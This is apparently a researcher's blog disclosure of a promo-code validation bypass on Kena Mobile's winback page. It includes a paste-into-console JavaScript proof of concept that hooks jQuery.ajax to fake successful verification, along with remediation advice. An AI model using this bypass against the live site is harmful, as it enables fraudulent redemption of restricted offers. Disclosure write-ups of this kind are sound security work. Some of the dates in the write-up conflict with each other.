Bypassing Winback Promo Validation on Kena Mobile (Telecom Italia)

30 October 2025 • Fixed in <48h • No CVE • Business Impact

TL;DR: The winback promo code verification on kenamobile.it/winback2024/ was entirely client-side. By hooking jQuery.ajax, I could force a successful response and redeem restricted offers without a valid code.

Discovery

While browsing Kena Mobile’s winback campaign page, I noticed the promo code + phone number verification form looked suspiciously lightweight. Opening DevTools revealed the request was a simple AJAX POST to WordPress’s admin-ajax.php — classic red flag for client-side logic.

Target URL: https://www.kenamobile.it/winback2024/

Normal Flow

The legitimate request:

POST https://www.kenamobile.it/wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded

action=apigtw&apigtw_action=verifyDataWinback&code=ABCD1234&msisdn=39XXXXXXXXXX

Successful server response:

{
  "code": 1,
  "data": {
    "said": "WB2024-XXXXXXXXXX"
  }
}

Proof of Concept – Full Client-Side Bypass

The page performs two AJAX calls. Both can be intercepted and forged:

// Paste this in browser console on https://www.kenamobile.it/winback2024/
      (() => {
        // Save original jQuery.ajax
        jQuery.ajax.original = jQuery.ajax;
      
        // Override AJAX globally
        jQuery.ajax = function(o) {
          // 1. First call – verifyDataWinback
          if (o.data && o.data.includes('verifyDataWinback')) {
            console.log('[PoC] Bypassing winback verification...');
            setTimeout(() => o.success?.({
              data: { code: 1, data: { said: "BYPASSNOV25" } }
            }), 500);
            return { abort: () => {} };
          }
      
          // 2. Second call –> confirm SAID token
          if (o.data && o.data.includes('saidResponse')) {
            console.log('[PoC] Confirming fake offer...');
            setTimeout(() => o.success?.('kena-pack-per-te-5g'), 300);
            return { abort: () => {} };
          }
      
          // All other requests with normal behavior
          return jQuery.ajax.original.apply(this, arguments);
        };
      
        console.log('Winback bypass active – just click "Verifica"');
      })();

After pasting and clicking “Verifica” (even with garbage code/phone), the page shows the restricted offer as unlocked.

Impact

Anyone could redeem restricted winback offers (usually ex-customers only)
Mass abuse possible via simple bookmarklet or userscript
Direct revenue loss and marketing campaign dilution for Kena Mobile / TIM

Responsible Disclosure Timeline

3 Nov 2025	Report sent to IT coordinator at Kena Mobile
18 Nov 2025	No response received
19 Nov 2025	Disclosure published

Recommendations

Move all business-critical validation server-side
Add one-time nonce/CSRF token per session
Rate-limit verification endpoint per MSISDN/IP

Final Notes

No real user data was accessed. Testing performed ethically on my own number.

← Back to blog